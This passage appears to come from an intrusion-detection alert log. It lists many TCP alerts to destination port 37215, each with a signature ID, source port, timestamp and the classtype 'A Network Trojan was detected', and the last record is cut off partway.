          SID:2835222
          Source Port:34414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155341
          SID:2829579
          Source Port:44768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549427
          SID:2829579
          Source Port:39750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912927
          SID:2829579
          Source Port:58510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745954
          SID:2829579
          Source Port:54690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039508
          SID:2835222
          Source Port:48630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396256
          SID:2829579
          Source Port:39410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405910
          SID:2829579
          Source Port:51322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192523
          SID:2829579
          Source Port:44748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601066
          SID:2835222
          Source Port:38620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673474
          SID:2829579
          Source Port:38616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264633
          SID:2835222
          Source Port:41942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668542
          SID:2829579
          Source Port:55312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041081
          SID:2829579
          Source Port:48312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811187
          SID:2835222
          Source Port:50218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786811
          SID:2829579
          Source Port:36872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175462
          SID:2835222
          Source Port:41294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446528
          SID:2835222
          Source Port:33818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552466
          SID:2835222
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731676
          SID:2829579
          Source Port:40042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510319
          SID:2829579
          Source Port:53242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353621
          SID:2829579
          Source Port:37922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111967
          SID:2829579
          Source Port:55490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269128
          SID:2829579
          Source Port:33562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895770
          SID:2835222
          Source Port:44462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130755
          SID:2829579
          Source Port:53200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891410
          SID:2835222
          Source Port:49132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731116
          SID:2835222
          Source Port:55096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087399
          SID:2835222
          Source Port:56072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601367
          SID:2835222
          Source Port:51626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795259
          SID:2829579
          Source Port:54714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705302
          SID:2835222
          Source Port:58262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353091
          SID:2835222
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897196
          SID:2835222
          Source Port:48384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894357
          SID:2829579
          Source Port:51812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410084
          SID:2829579
          Source Port:57562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787889
          SID:2829579
          Source Port:38850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108700
          SID:2835222
          Source Port:34774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018867
          SID:2829579
          Source Port:55676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510822
          SID:2835222
          Source Port:40384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509190
          SID:2829579
          Source Port:45854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842272
          SID:2835222
          Source Port:44170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745176
          SID:2835222
          Source Port:55178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109224
          SID:2835222
          Source Port:49392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158108
          SID:2835222
          Source Port:42544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112668
          SID:2835222
          Source Port:56868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270357
          SID:2835222
          Source Port:48214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857690
          SID:2835222
          Source Port:45536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730121
          SID:2835222
          Source Port:47380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912080
          SID:2829579
          Source Port:57552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550163
          SID:2835222
          Source Port:43806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403629
          SID:2835222
          Source Port:40710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549445
          SID:2835222
          Source Port:57240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743648
          SID:2835222
          Source Port:55398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150661
          SID:2835222
          Source Port:48552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804202
          SID:2835222
          Source Port:57148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460217
          SID:2829579
          Source Port:37476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272100
          SID:2835222
          Source Port:38480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548812
          SID:2835222
          Source Port:44620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783242
          SID:2829579
          Source Port:43822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113130
          SID:2829579
          Source Port:51136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174903
          SID:2829579
          Source Port:55612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233704
          SID:2835222
          Source Port:55028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855105
          SID:2835222
          Source Port:35774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509799
          SID:2829579
          Source Port:35770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792841
          SID:2835222
          Source Port:59932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159283
          SID:2829579
          Source Port:51516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236664
          SID:2829579
          Source Port:49502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037983
          SID:2829579
          Source Port:60782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810341
          SID:2829579
          Source Port:47742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808930
          SID:2835222
          Source Port:37046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441372
          SID:2829579
          Source Port:34892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176611
          SID:2835222
          Source Port:54590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016531
          SID:2829579
          Source Port:42428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166737
          SID:2835222
          Source Port:52804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673173
          SID:2829579
          Source Port:60974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160731
          SID:2835222
          Source Port:56340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175216
          SID:2835222
          Source Port:45026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355908
          SID:2835222
          Source Port:57788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729995
          SID:2835222
          Source Port:44226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857190
          SID:2835222
          Source Port:60814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114193
          SID:2829579
          Source Port:44188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177828
          SID:2829579
          Source Port:48218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894067
          SID:2835222
          Source Port:59030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175704
          SID:2829579
          Source Port:46784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176418
          SID:2829579
          Source Port:43146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797034
          SID:2835222
          Source Port:45614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037103
          SID:2835222
          Source Port:49890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806455
          SID:2829579
          Source Port:44424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128580
          SID:2829579
          Source Port:46428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747523
          SID:2829579
          Source Port:60510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550964
          SID:2835222
          Source Port:52888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233556
          SID:2829579
          Source Port:40776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019912
          SID:2829579
          Source Port:53412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672794
          SID:2829579
          Source Port:55470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071192
          SID:2835222
          Source Port:57526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599463
          SID:2835222
          Source Port:49650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107279
          SID:2835222
          Source Port:44620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272085
          SID:2835222
          Source Port:43238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860265
          SID:2829579
          Source Port:57186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466218
          SID:2835222
          Source Port:34142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857478
          SID:2829579
          Source Port:40890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462005
          SID:2829579
          Source Port:53248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178297
          SID:2835222
          Source Port:51604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704370
          SID:2829579
          Source Port:33798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306466
          SID:2829579
          Source Port:37886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067915
          SID:2829579
          Source Port:44216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781810
          SID:2835222
          Source Port:52808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891088
          SID:2835222
          Source Port:52168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176826
          SID:2829579
          Source Port:38624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306391
          SID:2835222
          Source Port:48802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108118
          SID:2829579
          Source Port:35218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467051
          SID:2835222
          Source Port:52452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549613
          SID:2829579
          Source Port:55320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514531
          SID:2829579
          Source Port:36320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604713
          SID:2829579
          Source Port:50990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107697
          SID:2835222
          Source Port:57742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173003
          SID:2829579
          Source Port:52138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817593
          SID:2835222
          Source Port:59994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266031
          SID:2829579
          Source Port:34068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447143
          SID:2829579
          Source Port:35648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601489
          SID:2829579
          Source Port:54202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550693
          SID:2829579
          Source Port:53642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396340
          SID:2829579
          Source Port:56656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173146
          SID:2835222
          Source Port:56036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236100
          SID:2829579
          Source Port:34060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792462
          SID:2829579
          Source Port:60022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463153
          SID:2835222
          Source Port:37432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786895
          SID:2829579
          Source Port:54126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078951
          SID:2829579
          Source Port:40524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516771
          SID:2829579
          Source Port:58794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892495
          SID:2829579
          Source Port:41028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731284
          SID:2829579
          Source Port:54030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160577
          SID:2835222
          Source Port:49822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466905
          SID:2829579
          Source Port:52376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.849700
          SID:2829579
          Source Port:49538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461377
          SID:2829579
          Source Port:52842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352202
          SID:2829579
          Source Port:51854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161564
          SID:2835222
          Source Port:52616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239701
          SID:2835222
          Source Port:48754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239845
          SID:2829579
          Source Port:57930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263851
          SID:2835222
          Source Port:43414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038891
          SID:2835222
          Source Port:38352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018351
          SID:2829579
          Source Port:52310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742968
          SID:2829579
          Source Port:42652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743721
          SID:2835222
          Source Port:38292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888343
          SID:2835222
          Source Port:34266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108356
          SID:2835222
          Source Port:49442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111115
          SID:2829579
          Source Port:33924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353574
          SID:2829579
          Source Port:38976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465121
          SID:2829579
          Source Port:46618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040136
          SID:2835222
          Source Port:44272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837326
          SID:2835222
          Source Port:60648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108363
          SID:2835222
          Source Port:34358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306736
          SID:2829579
          Source Port:48286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456390
          SID:2829579
          Source Port:46024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176956
          SID:2835222
          Source Port:41554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745471
          SID:2835222
          Source Port:45966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262060
          SID:2829579
          Source Port:52508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789621
          SID:2835222
          Source Port:58236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606462
          SID:2835222
          Source Port:47368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601731
          SID:2835222
          Source Port:42758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466651
          SID:2835222
          Source Port:55622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551405
          SID:2835222
          Source Port:55198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890529
          SID:2829579
          Source Port:37924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706672
          SID:2835222
          Source Port:55906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709866
          SID:2829579
          Source Port:51212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740479
          SID:2835222
          Source Port:41240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512022
          SID:2829579
          Source Port:56438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038124
          SID:2829579
          Source Port:53766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241051
          SID:2835222
          Source Port:46798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354178
          SID:2835222
          Source Port:48058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306451
          SID:2835222
          Source Port:56520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554301
          SID:2835222
          Source Port:39978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897270
          SID:2829579
          Source Port:34452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274528
          SID:2835222
          Source Port:38810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853144
          SID:2829579
          Source Port:38774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111174
          SID:2829579
          Source Port:36420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131786
          SID:2829579
          Source Port:52902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462462
          SID:2835222
          Source Port:56252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042122
          SID:2835222
          Source Port:49844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299610
          SID:2835222
          Source Port:47534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356070
          SID:2829579
          Source Port:34970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405962
          SID:2835222
          Source Port:41946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789645
          SID:2835222
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160196
          SID:2835222
          Source Port:51858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604856
          SID:2835222
          Source Port:41068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746681
          SID:2829579
          Source Port:58900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816934
          SID:2829579
          Source Port:38886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600562
          SID:2835222
          Source Port:36980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888502
          SID:2829579
          Source Port:36092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463046
          SID:2835222
          Source Port:35956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787787
          SID:2835222
          Source Port:59492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018257
          SID:2829579
          Source Port:48728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153874
          SID:2835222
          Source Port:45492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510956
          SID:2829579
          Source Port:50152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553365
          SID:2835222
          Source Port:40644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042329
          SID:2829579
          Source Port:43926
          Destination Port:37215
